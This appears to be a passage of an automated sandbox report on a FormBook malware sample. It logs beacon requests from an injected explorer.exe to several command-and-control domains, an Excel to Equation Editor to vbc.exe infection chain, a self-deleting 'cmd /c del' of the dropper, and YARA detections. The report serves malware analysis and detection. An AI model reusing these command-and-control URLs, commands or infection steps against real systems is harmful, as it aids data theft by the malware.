                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      5192.168.2.224917634.102.136.18080C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Sep 15, 2021 11:19:13.157188892 CEST596OUTGET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=54OfAHeKGwMzfFPkI96ZbDhctG36f6+/FiUzkHshmPfrtcl9VWH+3olASXX+4wyWJIckJQ== HTTP/1.1
                                                                                      Host: www.hanlansmojitovillage.net
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Sep 15, 2021 11:19:13.272679090 CEST596INHTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Wed, 15 Sep 2021 09:19:13 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "6139efab-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      6192.168.2.224918034.102.136.18080C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Sep 15, 2021 11:19:54.712455034 CEST600OUTGET /nthe/?5jo4nr=JnpX3/YBBy9TCXbKhp8uYEFRBGzb3gJR2p4kRdES4yzOlzRdyh/c8y0xiKK/8z4KJyQSLA==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1
                                                                                      Host: www.thaysay.net
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Sep 15, 2021 11:19:54.827491045 CEST600INHTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Wed, 15 Sep 2021 09:19:54 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "6139ed55-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      7192.168.2.224918234.102.136.18080C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Sep 15, 2021 11:20:05.010581970 CEST602OUTGET /nthe/?5jo4nr=B6rYep0Vm3M2EhGqYu/feA67U2SQJtGoCN7KN6fFlDVSMwI26b57yYW0nsnzi8vT4Ky8RQ==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1
                                                                                      Host: www.onpar-golf.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Sep 15, 2021 11:20:05.125579119 CEST603INHTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Wed, 15 Sep 2021 09:20:05 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "6139ed55-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      8192.168.2.2249183192.99.131.25280C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Sep 15, 2021 11:20:10.230083942 CEST604OUTGET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot/hSP0U84YZk1QGO5z/hARin1ng6rxU4Y++sy6YdGpizQ== HTTP/1.1
                                                                                      Host: www.americanstonesusa.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Sep 15, 2021 11:20:10.341188908 CEST604INHTTP/1.1 301 Moved Permanently
                                                                                      Date: Wed, 15 Sep 2021 09:20:10 GMT
                                                                                      Server: Apache
                                                                                      Location: https://www.americanstonesusa.com/nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot/hSP0U84YZk1QGO5z/hARin1ng6rxU4Y++sy6YdGpizQ==
                                                                                      Content-Length: 354
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 6d 65 72 69 63 61 6e 73 74 6f 6e 65 73 75 73 61 2e 63 6f 6d 2f 6e 74 68 65 2f 3f 74 34 38 74 4a 3d 66 4a 45 70 5f 48 4e 38 6d 50 69 54 48 4e 35 50 26 61 6d 70 3b 35 6a 6f 34 6e 72 3d 54 69 57 6b 67 48 34 55 6b 43 37 43 49 71 7a 39 6b 74 63 52 51 79 53 6e 6f 74 2f 68 53 50 30 55 38 34 59 5a 6b 31 51 47 4f 35 7a 2f 68 41 52 69 6e 31 6e 67 36 72 78 55 34 59 2b 2b 73 79 36 59 64 47 70 69 7a 51 3d 3d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.americanstonesusa.com/nthe/?t48tJ=fJEp_HN8mPiTHN5P&amp;5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot/hSP0U84YZk1QGO5z/hARin1ng6rxU4Y++sy6YdGpizQ==">here</a>.</p></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      9192.168.2.224918434.102.136.18080C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Sep 15, 2021 11:20:15.364769936 CEST605OUTGET /nthe/?5jo4nr=S+ZwTBrK0+7RoomNfSvQ9j84ffpxKdfieFGWtVtD4WHCIMGVYLqiZt07bDY98RTkl0TyTg==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1
                                                                                      Host: www.plasticplank.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Sep 15, 2021 11:20:15.480021954 CEST606INHTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Wed, 15 Sep 2021 09:20:15 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "6139ed55-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                      Code Manipulations

                                                                                      Statistics

                                                                                      Behavior

                                                                                      Click to jump to process

                                                                                      System Behavior

                                                                                      Analysis Process: EXCEL.EXE PID: 2920 Parent PID: 596

                                                                                      General

                                                                                      Start time:11:15:22
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                      Imagebase:0x13fa90000
                                                                                      File size:28253536 bytes
                                                                                      MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate

                                                                                      Analysis Process: EQNEDT32.EXE PID: 2808 Parent PID: 596

                                                                                      General

                                                                                      Start time:11:15:45
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                      Imagebase:0x400000
                                                                                      File size:543304 bytes
                                                                                      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Analysis Process: vbc.exe PID: 2976 Parent PID: 2808

                                                                                      General

                                                                                      Start time:11:15:48
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Users\Public\vbc.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Users\Public\vbc.exe'
                                                                                      Imagebase:0x200000
                                                                                      File size:556544 bytes
                                                                                      MD5 hash:989933E361010648C467C6D7B6C2D812
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000006.00000002.481016134.00000000023ED000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.481283058.00000000033B9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.481283058.00000000033B9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.481283058.00000000033B9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      Antivirus matches:
                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                      Reputation:low

                                                                                      Analysis Process: vbc.exe PID: 836 Parent PID: 2976

                                                                                      General

                                                                                      Start time:11:15:51
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Users\Public\vbc.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Users\Public\vbc.exe
                                                                                      Imagebase:0x200000
                                                                                      File size:556544 bytes
                                                                                      MD5 hash:989933E361010648C467C6D7B6C2D812
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low

                                                                                      Analysis Process: vbc.exe PID: 2636 Parent PID: 2976

                                                                                      General

                                                                                      Start time:11:15:52
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Users\Public\vbc.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\Public\vbc.exe
                                                                                      Imagebase:0x200000
                                                                                      File size:556544 bytes
                                                                                      MD5 hash:989933E361010648C467C6D7B6C2D812
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.540998722.00000000001C0000.00000040.00020000.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.540998722.00000000001C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.540998722.00000000001C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.540894487.0000000000080000.00000040.00020000.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.540894487.0000000000080000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.540894487.0000000000080000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      Reputation:low

                                                                                      Analysis Process: explorer.exe PID: 1764 Parent PID: 2636

                                                                                      General

                                                                                      Start time:11:15:54
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\explorer.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\Explorer.EXE
                                                                                      Imagebase:0xffa10000
                                                                                      File size:3229696 bytes
                                                                                      MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.506424858.0000000009AA6000.00000040.00020000.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.506424858.0000000009AA6000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.506424858.0000000009AA6000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.498846912.0000000009AA6000.00000040.00020000.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.498846912.0000000009AA6000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.498846912.0000000009AA6000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      Reputation:high

                                                                                      Analysis Process: ipconfig.exe PID: 1012 Parent PID: 2636

                                                                                      General

                                                                                      Start time:11:16:21
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\SysWOW64\ipconfig.exe
                                                                                      Imagebase:0x2f0000
                                                                                      File size:27136 bytes
                                                                                      MD5 hash:CABB20E171770FF64614A54C1F31C033
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.687551604.00000000002C0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.687551604.00000000002C0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.687551604.00000000002C0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.687510611.0000000000290000.00000040.00020000.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.687510611.0000000000290000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.687510611.0000000000290000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      Reputation:moderate

                                                                                      Analysis Process: cmd.exe PID: 2688 Parent PID: 1012

                                                                                      General

                                                                                      Start time:11:16:22
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:/c del 'C:\Users\Public\vbc.exe'
                                                                                      Imagebase:0x4acd0000
                                                                                      File size:302592 bytes
                                                                                      MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Disassembly

                                                                                      Code Analysis

                                                                                      Reset < >